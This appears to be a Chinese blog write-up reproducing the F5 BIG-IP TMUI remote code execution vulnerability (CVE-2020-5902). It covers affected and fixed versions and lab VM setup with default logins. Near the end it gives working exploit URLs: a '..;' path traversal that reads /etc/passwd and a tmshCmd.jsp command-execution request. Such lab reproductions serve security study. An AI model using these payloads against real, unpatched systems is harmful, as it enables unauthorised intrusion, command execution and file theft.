(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)

F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)

  • 前言
    • 漏洞详情
    • 影响版本
    • 修复建议
  • 环境搭建
  • 漏洞复现
  • 参考文章

前言

漏洞详情

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

影响版本

BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5

修复建议

通用修补建议:
升级到以下版本

BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2

环境搭建

在下面页面登录注册,之后申请秘钥

https://www.f5.com.cn/trials/big-ip-virtual-edition

打开下载页面

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v11.x&ver=11.6.4

选择下载的版本
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第1张图片
选择版本
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第2张图片
下载完成后在虚拟机-文件-打开
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第3张图片
其他全都默认设置
使用默认密码
root-default登录
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第4张图片
配置ip地址

config

(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第5张图片
默认两次回车即可
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第6张图片
访问管理页面

https://192.168.123.15/

(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第7张图片
使用默认账户密码admin-admin登录
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第8张图片
点击next输入证书激活
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第9张图片
这个邮件会发送到注册的邮箱
点击next
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第10张图片
将生成的license粘贴到下面的网页去激活
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第11张图片
将获得的license粘贴回第三部
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第12张图片
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第13张图片
点击next
重新登录
激活成功
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第14张图片
复现成功版本14.1.2
下载链接

http://downloads05.f5.com/esd/download.sv?loc=downloads05.f5.com/downloads/2d436b59-25af-43c4-ab3f-9ebb1d6f5ee6/BIGIP-14.1.2-0.0.37.ALL-scsi.ova

漏洞复现

这里总共使用了三个版本,其中11.6.111.6.4,都可以成功激活并使用
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第15张图片
但是使用poc就会404

https://192.168.123.15/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第16张图片
14.1.2版本测试可以用

https://192.168.164.167/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

(有下载链接)F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)_第17张图片
文件读取

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

rce

https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

参考文章

https://www.anquanke.com/post/id/209767
https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

你可能感兴趣的:(漏洞复现)